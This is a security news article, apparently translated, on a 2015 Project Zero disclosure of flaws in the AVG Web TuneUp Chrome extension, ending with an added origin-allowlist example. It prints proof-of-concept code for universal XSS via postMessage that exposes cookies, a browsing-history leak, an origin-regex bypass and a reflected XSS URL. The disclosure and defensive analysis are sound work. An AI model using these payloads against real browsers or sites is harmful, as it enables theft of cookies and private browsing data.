Google Chrome plug-in AVG Web TuneUp exposes multiple high-risk vulnerabilities, affecting 9 million users - vulnerability warning - the black bar safety net

2015-12-31T00:00:00
ID MYHACK58:62201570581
Type myhack58
Reporter Anonymous
Modified 2015-12-31T00:00:00

Description

On 15 August this year, Project Zero member Tavis reported multiple vulnerabilities in the Google Chrome plug-in AVG Web TuneUp. The plug-in has about 9 million active users, so the impact is very broad. It adds a large number of APIs for manipulating Chrome, for example to hijack the search box and the new-tab page with ease. Because its installation process is very complex, it can evade Google's malware checks, in particular Chrome's check that guards against abuse of the extension APIs. Many of these APIs are in fact flawed: an attacker can craft a payload that steals the user's cookies on avg.com, read the user's browsing history and other private data, and possibly even achieve arbitrary command execution.

Attack techniques

In his e-mail to the vendor, Tavis listed several attack methods.

The "navigate" API produces a universal cross-site scripting (UXSS) vulnerability: attacker.com can read the visitor's mail from mail.google.com, or data from any other origin, across domains. Tavis's PoC is a loop over tab IDs (only the fragment "for (i = 0; i" survives on this page) that repeatedly uses window.postMessage, the JavaScript API for cross-origin messaging, to send the AVG Web TuneUp plug-in requests of the form:

    {
      origin: "web",
      action: "navigate",
      data: {
        url: "javascript:document.location.hostname.endsWith('.avg.com')"
           + "?" + "alert(document.domain + ':' + document.cookie)"
           + ":" + "false",
        tabID: i
      }
    }

When one of the user's tabs is on an avg.com site, this pops up the domain name and cookie value of the current site for any hostname ending in .avg.com.

The "recently" API leaks the current user's browsing history:

    window.addEventListener("message", receiveMessage, false);
    window.postMessage({ from: "web", to: "content", method: "recently" }, "*");

    function receiveMessage(event) {
      if (event.data != undefined && event.data.historyItems != undefined) {
        var obj = JSON.parse(event.data.historyItems);

        document.write("Here is a list of websites you've been visiting");
        document.write(" ");
        for (i in obj) {
          var d = new Date(obj[i]);
          document.write("" + i + " on " + d);
          document.write(" ");
        }
      }
    }

This is Tavis's PoC: it sends a request to the plug-in's "recently" API via window.postMessage to obtain the current user's browsing history, listens locally for the message event carrying the returned data, and then writes the data to the page.

The vendor then shipped a fix, but the fix was wrong and Tavis bypassed it. The fix added the following check:

    var match = event.origin.match(/https?:\/\/.*\.avg\.com/i);

    if (match != null) { ... }

This only checks whether the origin contains ".avg.com", which is easily bypassed: a domain such as https://www.avg.com.www.attacker.com passes the check, so both attacks above still work. And because the check accepts both http and https, it also introduces a man-in-the-middle problem. The vendor fixed this again, restricting the allowed domains to "mysearch.avg.com" and "webtuneup.avg.com". But the following XSS still allowed user data to be stolen:

    http://webtuneup.avg.com/static/dist/app/4.0.5.0/interstitial.html?risk=%3Cimg%20src=x%20onerror=alert(1)%3E&searchParams=%7B%22lang%22%3A%22en%22%2C%22pid%22%3A%22pid%22%2C%22v%22%3A%22vv%22%7D

The problem was fixed in AVG Web TuneUp version 4.2.5.169, which can be obtained by upgrading from the Chrome Web Store.
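As an added illustration (not Tavis's PoC and not AVG's code), the weak origin regex quoted above beside a strict allowlist check of the kind a content-script message handler should use, evaluated on a few constructed origins including the bypass shape from the article. The allowed hostnames are the two the second fix named; pinning the scheme to https is an assumption of this example.

```javascript
// Added example, not code from the article or from AVG: the weak origin
// check quoted in the article beside a strict allowlist check.

// Regex from the first (flawed) patch. It only tests for a substring, so
// ".avg.com" anywhere in the origin string satisfies it.
const WEAK_RE = /https?:\/\/.*\.avg\.com/i;

function weakOriginCheck(origin) {
  return WEAK_RE.exec(origin) !== null;
}

// Strict check: parse the origin and compare scheme + host exactly against
// an allowlist. Hostnames are the two the second fix restricted messages to;
// pinning the scheme to https is an assumption made for this example.
const ALLOWED_ORIGINS = new Set([
  "https://mysearch.avg.com",
  "https://webtuneup.avg.com",
]);

function strictOriginCheck(origin) {
  let url;
  try {
    url = new URL(origin);
  } catch (_) {
    return false; // unparsable origin, e.g. the opaque "null" origin
  }
  // Rebuild the origin from parsed parts so nothing but scheme and host
  // takes part in the comparison.
  return ALLOWED_ORIGINS.has(`${url.protocol}//${url.host}`);
}

// A content-script message handler gated by the strict check: returns the
// message data for a trusted origin, otherwise null (message ignored).
function receiveMessage(event) {
  return strictOriginCheck(event.origin) ? event.data : null;
}

// Evaluate both checks on one origin string so the disagreement is visible.
function compareChecks(origin) {
  return { weak: weakOriginCheck(origin), strict: strictOriginCheck(origin) };
}

// Constructed sample origins, including the bypass shape from the article.
for (const o of ["https://webtuneup.avg.com",
                 "http://webtuneup.avg.com",
                 "https://www.avg.com.www.attacker.com"]) {
  console.log(o, compareChecks(o));
}
```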

